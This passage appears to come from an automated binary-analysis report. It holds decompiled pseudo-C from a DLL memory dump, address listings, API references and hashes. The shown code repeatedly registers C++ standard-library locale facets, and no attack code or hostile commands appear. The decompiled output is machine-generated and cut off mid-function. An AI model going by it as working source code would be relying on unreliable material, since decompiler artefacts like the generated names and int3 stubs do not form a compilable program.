																E6E1E3D74(_t462 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t327, _t433, _t444, 0x14);
																E6E1C6653(_t462 - 0x14, 0);
																_t445 =  *0x6e286ddc; // 0x0
																 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																 *(_t462 - 0x10) = _t445;
																_t205 = E6E1A161C(0x6e286d88);
																_t358 =  *((intOrPtr*)(_t462 + 8));
																_t434 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t205);
																__eflags = _t434;
																if(_t434 != 0) {
																	L33:
																	E6E1C66BA(_t462 - 0x14);
																	return E6E1E0075(_t434);
																} else {
																	__eflags = _t445;
																	if(_t445 == 0) {
																		_push( *((intOrPtr*)(_t462 + 8)));
																		_push(_t462 - 0x10);
																		__eflags = E6E1D1409(_t327, _t358, _t428, _t434, _t445) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t462 - 0x20);
																			E6E1E3D74(_t462 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t327, _t434, _t445, 0x14);
																			E6E1C6653(_t462 - 0x14, 0);
																			_t446 =  *0x6e286de0; // 0x0
																			 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																			 *(_t462 - 0x10) = _t446;
																			_t218 = E6E1A161C(0x6e286d8c);
																			_t365 =  *((intOrPtr*)(_t462 + 8));
																			_t435 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t218);
																			__eflags = _t435;
																			if(_t435 != 0) {
																				L40:
																				E6E1C66BA(_t462 - 0x14);
																				return E6E1E0075(_t435);
																			} else {
																				__eflags = _t446;
																				if(_t446 == 0) {
																					_push( *((intOrPtr*)(_t462 + 8)));
																					_push(_t462 - 0x10);
																					__eflags = E6E1D1471(_t327, _t365, _t428, _t435, _t446) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t462 - 0x20);
																						E6E1E3D74(_t462 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t327, _t435, _t446, 0x14);
																						E6E1C6653(_t462 - 0x14, 0);
																						_t447 =  *0x6e286dfc; // 0x0
																						 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																						 *(_t462 - 0x10) = _t447;
																						_t231 = E6E1A161C(0x6e286da8);
																						_t372 =  *((intOrPtr*)(_t462 + 8));
																						_t436 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t231);
																						__eflags = _t436;
																						if(_t436 != 0) {
																							L47:
																							E6E1C66BA(_t462 - 0x14);
																							return E6E1E0075(_t436);
																						} else {
																							__eflags = _t447;
																							if(_t447 == 0) {
																								_push( *((intOrPtr*)(_t462 + 8)));
																								_push(_t462 - 0x10);
																								__eflags = E6E1D14EC(_t327, _t372, _t428, _t436, _t447) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t462 - 0x20);
																									E6E1E3D74(_t462 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t327, _t436, _t447, 0x14);
																									E6E1C6653(_t462 - 0x14, 0);
																									_t448 =  *0x6e286dcc; // 0x0
																									 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																									 *(_t462 - 0x10) = _t448;
																									_t244 = E6E1A161C(0x6e286d80);
																									_t379 =  *((intOrPtr*)(_t462 + 8));
																									_t437 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t244);
																									__eflags = _t437;
																									if(_t437 != 0) {
																										L54:
																										E6E1C66BA(_t462 - 0x14);
																										return E6E1E0075(_t437);
																									} else {
																										__eflags = _t448;
																										if(_t448 == 0) {
																											_push( *((intOrPtr*)(_t462 + 8)));
																											_push(_t462 - 0x10);
																											__eflags = E6E1D1558(_t327, _t379, _t428, _t437, _t448) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t462 - 0x20);
																												E6E1E3D74(_t462 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t327, _t437, _t448, 0x14);
																												E6E1C6653(_t462 - 0x14, 0);
																												_t449 =  *0x6e286e00; // 0x0
																												 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																												 *(_t462 - 0x10) = _t449;
																												_t257 = E6E1A161C(0x6e286dac);
																												_t386 =  *((intOrPtr*)(_t462 + 8));
																												_t438 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t257);
																												__eflags = _t438;
																												if(_t438 != 0) {
																													L61:
																													E6E1C66BA(_t462 - 0x14);
																													return E6E1E0075(_t438);
																												} else {
																													__eflags = _t449;
																													if(_t449 == 0) {
																														_push( *((intOrPtr*)(_t462 + 8)));
																														_push(_t462 - 0x10);
																														__eflags = E6E1D15C4(_t327, _t386, _t428, _t438, _t449) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t462 - 0x20);
																															E6E1E3D74(_t462 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t327, _t438, _t449, 0x14);
																															E6E1C6653(_t462 - 0x14, 0);
																															_t450 =  *0x6e286dd0; // 0x0
																															 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																															 *(_t462 - 0x10) = _t450;
																															_t270 = E6E1A161C(0x6e286d60);
																															_t393 =  *((intOrPtr*)(_t462 + 8));
																															_t439 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t270);
																															__eflags = _t439;
																															if(_t439 != 0) {
																																L68:
																																E6E1C66BA(_t462 - 0x14);
																																return E6E1E0075(_t439);
																															} else {
																																__eflags = _t450;
																																if(_t450 == 0) {
																																	_push( *((intOrPtr*)(_t462 + 8)));
																																	_push(_t462 - 0x10);
																																	__eflags = E6E1D162A(_t327, _t393, _t428, _t439, _t450) - 0xffffffff;
																																	if(__eflags == 0) {
																																		_t397 = _t462 - 0x20;
																																		E6E1A1438(_t397);
																																		E6E1E3D74(_t462 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e22851f, _t327, _t439, _t450, 4);
																																		_t451 = _t397;
																																		 *(_t462 - 0x10) = _t451;
																																		 *((intOrPtr*)(_t451 + 4)) =  *((intOrPtr*)(_t462 + 0xc));
																																		_push( *((intOrPtr*)(_t462 + 0x14)));
																																		_t147 = _t462 - 4;
																																		 *_t147 =  *(_t462 - 4) & 0x00000000;
																																		__eflags =  *_t147;
																																		 *_t451 = 0x6e22c0c4;
																																		 *((char*)(_t451 + 0x28)) =  *((intOrPtr*)(_t462 + 0x10));
																																		E6E1D542F(_t327, _t397, _t428, _t439, _t451,  *_t147);
																																		return E6E1E0075(_t451,  *((intOrPtr*)(_t462 + 8)));
																																	} else {
																																		_t439 =  *(_t462 - 0x10);
																																		 *(_t462 - 0x10) = _t439;
																																		 *(_t462 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t439);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t439 + 4))))();
																																		 *0x6e286dd0 = _t439;
																																		goto L68;
																																	}
																																} else {
																																	_t439 = _t450;
																																	goto L68;
																																}
																															}
																														} else {
																															_t438 =  *(_t462 - 0x10);
																															 *(_t462 - 0x10) = _t438;
																															 *(_t462 - 4) = 1;
																															E6E1C6FD3(__eflags, _t438);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t438 + 4))))();
																															 *0x6e286e00 = _t438;
																															goto L61;
																														}
																													} else {
																														_t438 = _t449;
																														goto L61;
																													}
																												}
																											} else {
																												_t437 =  *(_t462 - 0x10);
																												 *(_t462 - 0x10) = _t437;
																												 *(_t462 - 4) = 1;
																												E6E1C6FD3(__eflags, _t437);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t437 + 4))))();
																												 *0x6e286dcc = _t437;
																												goto L54;
																											}
																										} else {
																											_t437 = _t448;
																											goto L54;
																										}
																									}
																								} else {
																									_t436 =  *(_t462 - 0x10);
																									 *(_t462 - 0x10) = _t436;
																									 *(_t462 - 4) = 1;
																									E6E1C6FD3(__eflags, _t436);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t436 + 4))))();
																									 *0x6e286dfc = _t436;
																									goto L47;
																								}
																							} else {
																								_t436 = _t447;
																								goto L47;
																							}
																						}
																					} else {
																						_t435 =  *(_t462 - 0x10);
																						 *(_t462 - 0x10) = _t435;
																						 *(_t462 - 4) = 1;
																						E6E1C6FD3(__eflags, _t435);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t435 + 4))))();
																						 *0x6e286de0 = _t435;
																						goto L40;
																					}
																				} else {
																					_t435 = _t446;
																					goto L40;
																				}
																			}
																		} else {
																			_t434 =  *(_t462 - 0x10);
																			 *(_t462 - 0x10) = _t434;
																			 *(_t462 - 4) = 1;
																			E6E1C6FD3(__eflags, _t434);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t434 + 4))))();
																			 *0x6e286ddc = _t434;
																			goto L33;
																		}
																	} else {
																		_t434 = _t445;
																		goto L33;
																	}
																}
															} else {
																_t433 =  *(_t462 - 0x10);
																 *(_t462 - 0x10) = _t433;
																 *(_t462 - 4) = 1;
																E6E1C6FD3(__eflags, _t433);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t433 + 4))))();
																 *0x6e286db0 = _t433;
																goto L26;
															}
														} else {
															_t433 = _t444;
															goto L26;
														}
													}
												} else {
													_t432 =  *(_t462 - 0x10);
													 *(_t462 - 0x10) = _t432;
													 *(_t462 - 4) = 1;
													E6E1C6FD3(__eflags, _t432);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t432 + 4))))();
													 *0x6e286dd8 = _t432;
													goto L19;
												}
											} else {
												_t432 = _t443;
												goto L19;
											}
										}
									} else {
										_t431 =  *(_t462 - 0x10);
										 *(_t462 - 0x10) = _t431;
										 *(_t462 - 4) = 1;
										E6E1C6FD3(__eflags, _t431);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t431 + 4))))();
										 *0x6e286dc4 = _t431;
										goto L12;
									}
								} else {
									_t431 = _t442;
									goto L12;
								}
							}
						} else {
							_t430 =  *(_t462 - 0x10);
							 *(_t462 - 0x10) = _t430;
							 *(_t462 - 4) = 1;
							E6E1C6FD3(__eflags, _t430);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t430 + 4))))();
							 *0x6e286dc8 = _t430;
							goto L5;
						}
					} else {
						_t430 = _t441;
						goto L5;
					}
				}
			}

0x6e1cf6b3
0x6e1cf6b3
0x6e1cf6ba
0x6e1cf6c4
0x6e1cf6c9
0x6e1cf6d4
0x6e1cf6d8
0x6e1cf6db
0x6e1cf6e0
0x6e1cf6e4
0x6e1cf6e9
0x6e1cf6ed
0x6e1cf732
0x6e1cf735
0x6e1cf741
0x6e1cf6ef
0x6e1cf6f1
0x6e1cf6f7
0x6e1cf6fd
0x6e1cf705
0x6e1cf708
0x6e1cf745
0x6e1cf753
0x6e1cf758
0x6e1cf760
0x6e1cf76a
0x6e1cf76f
0x6e1cf77a
0x6e1cf77e
0x6e1cf781
0x6e1cf786
0x6e1cf78f
0x6e1cf791
0x6e1cf793
0x6e1cf7d8
0x6e1cf7db
0x6e1cf7e7
0x6e1cf795
0x6e1cf795
0x6e1cf797
0x6e1cf79d
0x6e1cf7a3
0x6e1cf7ab
0x6e1cf7ae
0x6e1cf7eb
0x6e1cf7f9
0x6e1cf7fe
0x6e1cf806
0x6e1cf810
0x6e1cf815
0x6e1cf820
0x6e1cf824
0x6e1cf827
0x6e1cf82c
0x6e1cf835
0x6e1cf837
0x6e1cf839
0x6e1cf87e
0x6e1cf881
0x6e1cf88d
0x6e1cf83b
0x6e1cf83b
0x6e1cf83d
0x6e1cf843
0x6e1cf849
0x6e1cf851
0x6e1cf854
0x6e1cf891
0x6e1cf89f
0x6e1cf8a4
0x6e1cf8ac
0x6e1cf8b6
0x6e1cf8bb
0x6e1cf8c6
0x6e1cf8ca
0x6e1cf8cd
0x6e1cf8d2
0x6e1cf8db
0x6e1cf8dd
0x6e1cf8df
0x6e1cf924
0x6e1cf927
0x6e1cf933
0x6e1cf8e1
0x6e1cf8e1
0x6e1cf8e3
0x6e1cf8e9
0x6e1cf8ef
0x6e1cf8f7
0x6e1cf8fa
0x6e1cf937
0x6e1cf945
0x6e1cf94a
0x6e1cf952
0x6e1cf95c
0x6e1cf961
0x6e1cf96c
0x6e1cf970
0x6e1cf973
0x6e1cf978
0x6e1cf981
0x6e1cf983
0x6e1cf985
0x6e1cf9ca
0x6e1cf9cd
0x6e1cf9d9
0x6e1cf987
0x6e1cf987
0x6e1cf989
0x6e1cf98f
0x6e1cf995
0x6e1cf99d
0x6e1cf9a0
0x6e1cf9dd
0x6e1cf9eb
0x6e1cf9f0
0x6e1cf9f8
0x6e1cfa02
0x6e1cfa07
0x6e1cfa12
0x6e1cfa16
0x6e1cfa19
0x6e1cfa1e
0x6e1cfa27
0x6e1cfa29
0x6e1cfa2b
0x6e1cfa70
0x6e1cfa73
0x6e1cfa7f
0x6e1cfa2d
0x6e1cfa2d
0x6e1cfa2f
0x6e1cfa35
0x6e1cfa3b
0x6e1cfa43
0x6e1cfa46
0x6e1cfa83
0x6e1cfa91
0x6e1cfa96
0x6e1cfa9e
0x6e1cfaa8
0x6e1cfaad
0x6e1cfab8
0x6e1cfabc
0x6e1cfabf
0x6e1cfac4
0x6e1cfacd
0x6e1cfacf
0x6e1cfad1
0x6e1cfb16
0x6e1cfb19
0x6e1cfb25
0x6e1cfad3
0x6e1cfad3
0x6e1cfad5
0x6e1cfadb
0x6e1cfae1
0x6e1cfae9
0x6e1cfaec
0x6e1cfb29
0x6e1cfb37
0x6e1cfb3c
0x6e1cfb44
0x6e1cfb4e
0x6e1cfb53
0x6e1cfb5e
0x6e1cfb62
0x6e1cfb65
0x6e1cfb6a
0x6e1cfb73
0x6e1cfb75
0x6e1cfb77
0x6e1cfbbc
0x6e1cfbbf
0x6e1cfbcb
0x6e1cfb79
0x6e1cfb79
0x6e1cfb7b
0x6e1cfb81
0x6e1cfb87
0x6e1cfb8f
0x6e1cfb92
0x6e1cfbcf
0x6e1cfbdd
0x6e1cfbe2
0x6e1cfbea
0x6e1cfbf4
0x6e1cfbf9
0x6e1cfc04
0x6e1cfc08
0x6e1cfc0b
0x6e1cfc10
0x6e1cfc19
0x6e1cfc1b
0x6e1cfc1d
0x6e1cfc62
0x6e1cfc65
0x6e1cfc71
0x6e1cfc1f
0x6e1cfc1f
0x6e1cfc21
0x6e1cfc27
0x6e1cfc2d
0x6e1cfc35
0x6e1cfc38
0x6e1cfc75
0x6e1cfc83
0x6e1cfc88
0x6e1cfc90
0x6e1cfc9a
0x6e1cfc9f
0x6e1cfcaa
0x6e1cfcae
0x6e1cfcb1
0x6e1cfcb6
0x6e1cfcbf
0x6e1cfcc1
0x6e1cfcc3
0x6e1cfd08
0x6e1cfd0b
0x6e1cfd17
0x6e1cfcc5
0x6e1cfcc5
0x6e1cfcc7
0x6e1cfccd
0x6e1cfcd3
0x6e1cfcdb
0x6e1cfcde
0x6e1cfd18
0x6e1cfd1b
0x6e1cfd29
0x6e1cfd2e
0x6e1cfd36
0x6e1cfd3b
0x6e1cfd3d
0x6e1cfd43
0x6e1cfd46
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd53
0x6e1cfd59
0x6e1cfd5c
0x6e1cfd68
0x6e1cfce0
0x6e1cfce0
0x6e1cfce3
0x6e1cfce7
0x6e1cfceb
0x6e1cfcf8
0x6e1cfd00
0x6e1cfd02
0x00000000
0x6e1cfd02
0x6e1cfcc9
0x6e1cfcc9
0x00000000
0x6e1cfcc9
0x6e1cfcc7
0x6e1cfc3a
0x6e1cfc3a
0x6e1cfc3d
0x6e1cfc41
0x6e1cfc45
0x6e1cfc52
0x6e1cfc5a
0x6e1cfc5c
0x00000000
0x6e1cfc5c
0x6e1cfc23
0x6e1cfc23
0x00000000
0x6e1cfc23
0x6e1cfc21
0x6e1cfb94
0x6e1cfb94
0x6e1cfb97
0x6e1cfb9b
0x6e1cfb9f
0x6e1cfbac
0x6e1cfbb4
0x6e1cfbb6
0x00000000
0x6e1cfbb6
0x6e1cfb7d
0x6e1cfb7d
0x00000000
0x6e1cfb7d
0x6e1cfb7b
0x6e1cfaee
0x6e1cfaee
0x6e1cfaf1
0x6e1cfaf5
0x6e1cfaf9
0x6e1cfb06
0x6e1cfb0e
0x6e1cfb10
0x00000000
0x6e1cfb10
0x6e1cfad7
0x6e1cfad7
0x00000000
0x6e1cfad7
0x6e1cfad5
0x6e1cfa48
0x6e1cfa48
0x6e1cfa4b
0x6e1cfa4f
0x6e1cfa53
0x6e1cfa60
0x6e1cfa68
0x6e1cfa6a
0x00000000
0x6e1cfa6a
0x6e1cfa31
0x6e1cfa31
0x00000000
0x6e1cfa31
0x6e1cfa2f
0x6e1cf9a2
0x6e1cf9a2
0x6e1cf9a5
0x6e1cf9a9
0x6e1cf9ad
0x6e1cf9ba
0x6e1cf9c2
0x6e1cf9c4
0x00000000
0x6e1cf9c4
0x6e1cf98b
0x6e1cf98b
0x00000000
0x6e1cf98b
0x6e1cf989
0x6e1cf8fc
0x6e1cf8fc
0x6e1cf8ff
0x6e1cf903
0x6e1cf907
0x6e1cf914
0x6e1cf91c
0x6e1cf91e
0x00000000
0x6e1cf91e
0x6e1cf8e5
0x6e1cf8e5
0x00000000
0x6e1cf8e5
0x6e1cf8e3
0x6e1cf856
0x6e1cf856
0x6e1cf859
0x6e1cf85d
0x6e1cf861
0x6e1cf86e
0x6e1cf876
0x6e1cf878
0x00000000
0x6e1cf878
0x6e1cf83f
0x6e1cf83f
0x00000000
0x6e1cf83f
0x6e1cf83d
0x6e1cf7b0
0x6e1cf7b0
0x6e1cf7b3
0x6e1cf7b7
0x6e1cf7bb
0x6e1cf7c8
0x6e1cf7d0
0x6e1cf7d2
0x00000000
0x6e1cf7d2
0x6e1cf799
0x6e1cf799
0x00000000
0x6e1cf799
0x6e1cf797
0x6e1cf70a
0x6e1cf70a
0x6e1cf70d
0x6e1cf711
0x6e1cf715
0x6e1cf722
0x6e1cf72a
0x6e1cf72c
0x00000000
0x6e1cf72c
0x6e1cf6f3
0x6e1cf6f3
0x00000000
0x6e1cf6f3
0x6e1cf6f1

APIs

__EH_prolog3.LIBCMT ref: 6E1CF6BA
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF6C4
int.LIBCPMT ref: 6E1CF6DB

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

moneypunct.LIBCPMT ref: 6E1CF6FE
std::_Facet_Register.LIBCPMT ref: 6E1CF715
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF735
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF753

Strings

|m(n, xrefs: 6E1CF6CF

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID: |m(n
API String ID: 113178234-3086318270
Opcode ID: fc78a3b27c5135cf34af98996f2bb328d18944f54ae46bfa6ac2d31ad024e69e
Instruction ID: 512abda1d356cdfaf4a93c21c39796c7a73f13f250d808cd22af9e887090983e
Opcode Fuzzy Hash: fc78a3b27c5135cf34af98996f2bb328d18944f54ae46bfa6ac2d31ad024e69e
Instruction Fuzzy Hash: B5113A7591062C9FCF01DBD4C854AFEB77AAFA8B14F240408D020EB290CF7899C9E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CEEEB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CEEEB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t321;
				signed int _t322;
				void* _t334;
				void* _t347;
				void* _t360;
				void* _t373;
				void* _t386;
				void* _t399;
				void* _t412;
				void* _t425;
				void* _t438;
				void* _t451;
				void* _t464;
				void* _t477;
				void* _t490;
				void* _t503;
				void* _t516;
				void* _t529;
				void* _t542;
				void* _t555;
				void* _t568;
				void* _t581;
				void* _t594;
				signed int _t853;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				signed int _t952;
				signed int _t953;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				void* _t990;

				_t920 = __edx;
				_t699 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t990 - 0x14, 0);
				_t945 =  *0x6e286e04; // 0x0
				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
				 *(_t990 - 0x10) = _t945;
				_t321 = E6E1A161C(0x6e286b30);
				_t702 =  *((intOrPtr*)(_t990 + 8));
				_t322 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t321);
				_t922 = _t322;
				if(_t322 != 0) {
					L5:
					E6E1C66BA(_t990 - 0x14);
					return E6E1E0075(_t922);
				} else {
					if(_t945 == 0) {
						_push( *((intOrPtr*)(_t990 + 8)));
						_push(_t990 - 0x10);
						__eflags = E6E1D0C9D(__ebx, _t702, __edx, _t922, _t945) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t990 - 0x20);
							E6E1E3D74(_t990 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t922, _t945, 0x14);
							E6E1C6653(_t990 - 0x14, 0);
							_t946 =  *0x6e286de4; // 0x0
							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
							 *(_t990 - 0x10) = _t946;
							_t334 = E6E1A161C(0x6e286d90);
							_t709 =  *((intOrPtr*)(_t990 + 8));
							_t923 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t334);
							__eflags = _t923;
							if(_t923 != 0) {
								L12:
								E6E1C66BA(_t990 - 0x14);
								return E6E1E0075(_t923);
							} else {
								__eflags = _t946;
								if(_t946 == 0) {
									_push( *((intOrPtr*)(_t990 + 8)));
									_push(_t990 - 0x10);
									__eflags = E6E1D0D03(_t699, _t709, __edx, _t923, _t946) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t990 - 0x20);
										E6E1E3D74(_t990 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t699, _t923, _t946, 0x14);
										E6E1C6653(_t990 - 0x14, 0);
										_t947 =  *0x6e286db4; // 0x0
										 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
										 *(_t990 - 0x10) = _t947;
										_t347 = E6E1A161C(0x6e286d68);
										_t716 =  *((intOrPtr*)(_t990 + 8));
										_t924 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t347);
										__eflags = _t924;
										if(_t924 != 0) {
											L19:
											E6E1C66BA(_t990 - 0x14);
											return E6E1E0075(_t924);
										} else {
											__eflags = _t947;
											if(_t947 == 0) {
												_push( *((intOrPtr*)(_t990 + 8)));
												_push(_t990 - 0x10);
												__eflags = E6E1D0DA5(_t699, _t716, __edx, _t924, _t947) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t990 - 0x20);
													E6E1E3D74(_t990 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t699, _t924, _t947, 0x14);
													E6E1C6653(_t990 - 0x14, 0);
													_t948 =  *0x6e286dd4; // 0x0
													 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
													 *(_t990 - 0x10) = _t948;
													_t360 = E6E1A161C(0x6e286b28);
													_t723 =  *((intOrPtr*)(_t990 + 8));
													_t925 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t360);
													__eflags = _t925;
													if(_t925 != 0) {
														L26:
														E6E1C66BA(_t990 - 0x14);
														return E6E1E0075(_t925);
													} else {
														__eflags = _t948;
														if(_t948 == 0) {
															_push( *((intOrPtr*)(_t990 + 8)));
															_push(_t990 - 0x10);
															__eflags = E6E1D0E47(_t699, _t723, _t920, _t925, _t948) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t990 - 0x20);
																E6E1E3D74(_t990 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t699, _t925, _t948, 0x14);
																E6E1C6653(_t990 - 0x14, 0);
																_t949 =  *0x6e286de8; // 0x0
																 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																 *(_t990 - 0x10) = _t949;
																_t373 = E6E1A161C(0x6e286d94);
																_t730 =  *((intOrPtr*)(_t990 + 8));
																_t926 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t373);
																__eflags = _t926;
																if(_t926 != 0) {
																	L33:
																	E6E1C66BA(_t990 - 0x14);
																	return E6E1E0075(_t926);
																} else {
																	__eflags = _t949;
																	if(_t949 == 0) {
																		_push( *((intOrPtr*)(_t990 + 8)));
																		_push(_t990 - 0x10);
																		__eflags = E6E1D0EB7(_t699, _t730, _t920, _t926, _t949) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t990 - 0x20);
																			E6E1E3D74(_t990 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t699, _t926, _t949, 0x14);
																			E6E1C6653(_t990 - 0x14, 0);
																			_t950 =  *0x6e286db8; // 0x0
																			 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																			 *(_t990 - 0x10) = _t950;
																			_t386 = E6E1A161C(0x6e286d6c);
																			_t737 =  *((intOrPtr*)(_t990 + 8));
																			_t927 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t386);
																			__eflags = _t927;
																			if(_t927 != 0) {
																				L40:
																				E6E1C66BA(_t990 - 0x14);
																				return E6E1E0075(_t927);
																			} else {
																				__eflags = _t950;
																				if(_t950 == 0) {
																					_push( *((intOrPtr*)(_t990 + 8)));
																					_push(_t990 - 0x10);
																					__eflags = E6E1D0F1F(_t699, _t737, _t920, _t927, _t950) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t990 - 0x20);
																						E6E1E3D74(_t990 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t699, _t927, _t950, 0x14);
																						E6E1C6653(_t990 - 0x14, 0);
																						_t951 =  *0x6e286dec; // 0x0
																						 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																						 *(_t990 - 0x10) = _t951;
																						_t399 = E6E1A161C(0x6e286d98);
																						_t744 =  *((intOrPtr*)(_t990 + 8));
																						_t928 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t399);
																						__eflags = _t928;
																						if(_t928 != 0) {
																							L47:
																							E6E1C66BA(_t990 - 0x14);
																							return E6E1E0075(_t928);
																						} else {
																							__eflags = _t951;
																							if(_t951 == 0) {
																								_push( *((intOrPtr*)(_t990 + 8)));
																								_push(_t990 - 0x10);
																								__eflags = E6E1D0F87(_t699, _t744, _t920, _t928, _t951) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t990 - 0x20);
																									E6E1E3D74(_t990 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t699, _t928, _t951, 0x14);
																									E6E1C6653(_t990 - 0x14, 0);
																									_t952 =  *0x6e286dbc; // 0x0
																									 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																									 *(_t990 - 0x10) = _t952;
																									_t412 = E6E1A161C(0x6e286d70);
																									_t751 =  *((intOrPtr*)(_t990 + 8));
																									_t929 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t412);
																									__eflags = _t929;
																									if(_t929 != 0) {
																										L54:
																										E6E1C66BA(_t990 - 0x14);
																										return E6E1E0075(_t929);
																									} else {
																										__eflags = _t952;
																										if(_t952 == 0) {
																											_push( *((intOrPtr*)(_t990 + 8)));
																											_push(_t990 - 0x10);
																											__eflags = E6E1D0FEF(_t699, _t751, _t920, _t929, _t952) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t990 - 0x20);
																												E6E1E3D74(_t990 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t699, _t929, _t952, 0x14);
																												E6E1C6653(_t990 - 0x14, 0);
																												_t953 =  *0x6e286df0; // 0x0
																												 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																												 *(_t990 - 0x10) = _t953;
